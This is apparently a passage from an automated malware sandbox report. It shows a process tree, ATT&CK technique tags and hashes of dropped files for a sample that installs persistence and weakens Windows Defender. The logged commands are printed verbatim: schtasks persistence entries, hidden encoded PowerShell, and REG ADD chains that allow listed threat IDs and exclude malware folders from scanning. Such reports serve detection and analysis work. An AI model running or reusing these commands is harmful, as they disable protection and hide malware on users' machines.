schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Creates scheduled task(s)
PID:5088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4676 -ip 4676
1⤵
PID:5244

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3220 -ip 3220
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1240 -ip 1240
1⤵
PID:5436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4060 -ip 4060
1⤵
PID:5540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
1⤵
PID:5700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4060 -ip 4060
1⤵
PID:5912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4060 -ip 4060
1⤵
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4060 -ip 4060
1⤵
PID:3092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4060 -ip 4060
1⤵
PID:2152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3736 -ip 3736
1⤵
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4116 -ip 4116
1⤵
PID:2172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4060 -ip 4060
1⤵
PID:4048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 3736 -ip 3736
1⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4060 -ip 4060
1⤵
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3736 -ip 3736
1⤵
PID:2280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 3736 -ip 3736
1⤵
PID:2688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 3736 -ip 3736
1⤵
PID:1564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 3736 -ip 3736
1⤵
PID:1164

C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\roCrebF.exe
C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\wwLMGvKHJFdcKei\roCrebF.exe j1 /site_id 525403 /S
1⤵
PID:3764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:2280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:3744

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5060

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:6020

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5408

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2172

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:4388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:4108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:3380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4640

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:3040

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4720

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5728

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:5508

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:5656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GuXKuCyCeSmjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bQZEOuyekqRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\lSmWvXKKfqUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uAhcATovcXckvYCnvyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wjTkFrExU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ZvEHJNdJDJxIeVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\HvrIGoRDYaykjTnO\" /t REG_DWORD /d 0 /reg:64;"
2⤵
PID:2752

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3460

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GuXKuCyCeSmjC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2628

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bQZEOuyekqRU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5740

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1452

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lSmWvXKKfqUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:6048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uAhcATovcXckvYCnvyR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5232

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:5476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wjTkFrExU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:5548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZvEHJNdJDJxIeVVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:5512

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ZvEHJNdJDJxIeVVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:2224

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ /t REG_DWORD /d 0 /reg:32
3⤵
PID:4156

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ /t REG_DWORD /d 0 /reg:64
3⤵
PID:5800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HvrIGoRDYaykjTnO /t REG_DWORD /d 0 /reg:32
3⤵
PID:1488

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HvrIGoRDYaykjTnO /t REG_DWORD /d 0 /reg:64
3⤵
PID:776

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gzcXbMwBT" /SC once /ST 01:19:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:2236

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gzcXbMwBT"
2⤵
PID:2144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
eaedab204896f724808abc08f5efeedb

SHA1
ad97f9d891aed52b440d1dda34552189378fa50d

SHA256
0a107330e96b93a5387702dfc2378bb25fe9e82a617e6499b9a84d65db9ac999

SHA512
1a99c6c1f98f9a6a18c23189c69c49992b4432728a99b7311aae9209310abefce37772575f990e5018730f654cd77e8046e267324283c1e34f4ffac7bccb0525

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\59B9B435CD0C292FC1DDBA7EBC9C0D3E
MD5
acbd189e46fb4b38fdc2ba3a4ab3ac48

SHA1
cf5d61e33f3c76b6c04ccd6df33e5390d5f40985

SHA256
64279b60942d609bd452b3c15a4f35025bd1949ce54c2e280710e9579d1d093c

SHA512
d5106a4af5abb2469673b104e4688ae9973e047907042f058485eb4e731a5df7c3276c685df2b26cacfb3d748476b41cd5443373568c3196da76ee63a9e60495

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
7ae0dca833be8fd0a006a6a65c86496d

SHA1
6963e07cf0fe1f4d5e4cb3503f02017e5d6407b2

SHA256
a4809f30b0dc47cb7eb0509c806fc72ab9a8941c624fa51ce9cd7107db83cab2

SHA512
cc3cb78d8bd1139c4b7b8454920760d7a4f1dd5d740ba7fc6ade1e537977f32b12644d3628fbd88ccdd4702d34011060231f6c0173a3ed954570450e7a81365e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
b0f8c16035b066b326999c9f26422098

SHA1
389a9e669628fcbedc35d908dcd4675f8dba9e79

SHA256
4c0c8af07363f3d178b6dd9ae0def73e9fbec4df49a8ab1dcf60d37ead768d78

SHA512
54ee8966beccd0ad9e9650b91191eca726a5b37e86fcabd75b41f8f0544b2328f9e2bbd2ff3e9e2098feaa36f6a769e9367db2f6f74e9910be0d3b5a29081369

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
MD5
4ca40691dc357da243b1a0654a0469d0

SHA1
3ef85af8cefb0651fc877a0023187d6d1d8a9df6

SHA256
4ec75ff4a7d7b2e00d602ea49cfa2ae2f735501504364ceb5856516f60cada39

SHA512
31d11e16be12efe24ffce58f59c87fb7f5c29a30f60d3d4facc38a3bce71891ecc042cd6c4c679105a4d9469f65c1a9fe048b669d48ca77b484bc67b274ebf21

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\59B9B435CD0C292FC1DDBA7EBC9C0D3E
MD5
9db900d05c47e19e76856551fe596037

SHA1
e4f7268c3744c91fe698806ff54fd58a82e70a30

SHA256
a9ec46028afd745f7f2c1344e4dcaa304ea5435a716fddc342befca1a1442598

SHA512
021ae874d09cdf4dd2de9da8f40a7f0c5255282aed3657ec47c0044c49ec07bda67eaf0412f0e8ca405c8da76b164a583e4ce308d33b38634c56316cd89fc23b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
4732adefb6e83e6cc5f28312620ca8e5

SHA1
5f7fb541118d939c75e0d21eee91da7ea6265049

SHA256
2507ebb912a4cfadfdac8044bc1c823261b2e58a3598a688b64bcc74a0ea7bb8

SHA512
a2444a6a5be267a16762c6fde29191b223497a99fb732ee078809afe2065f8ae604674cc2d3571ddd282620fa4a8105eff03d31be8204052a8805b2f9b4a40fd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
c28aa6714858ab3c760b37d2b8f22828

SHA1
be2f5e62cce20adbfa3d9586be0907dea20e0860

SHA256
1ee68d0f7cbf0a3d5f699673299501342ab89119497dddd19d6ddfea71c54c1c

SHA512
959bac5c318705a9ed17e2f5b04f10849336df3b5b1e7a4601dc893404374cfe3aedb56fc242320c060e3345faa8a05033f64569981d7d876b62cf35aa88b4b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
MD5
b87c0c2030be05ebaed571c5663ae0ee

SHA1
1f59c965177139c4b3fd5f49b627a989d6bed8d9

SHA256
2e250a30352d34e2f3c6d8ad27211415672737eada45351a2a747826da79cdf6

SHA512
e78746bd5359c7cecb6be089ba6fc8e67fd4f3ccf6db92559e46a836c7ff5301b78e6f1348938b8e0f1cfe4084be0d93c226dac1f968f0d597251d76d7998bef

Download Submit
C:\Users\Admin\AppData\Local\Temp\1eecf742-1598-4f6f-94ba-2cacc2fca9b4.exe
MD5
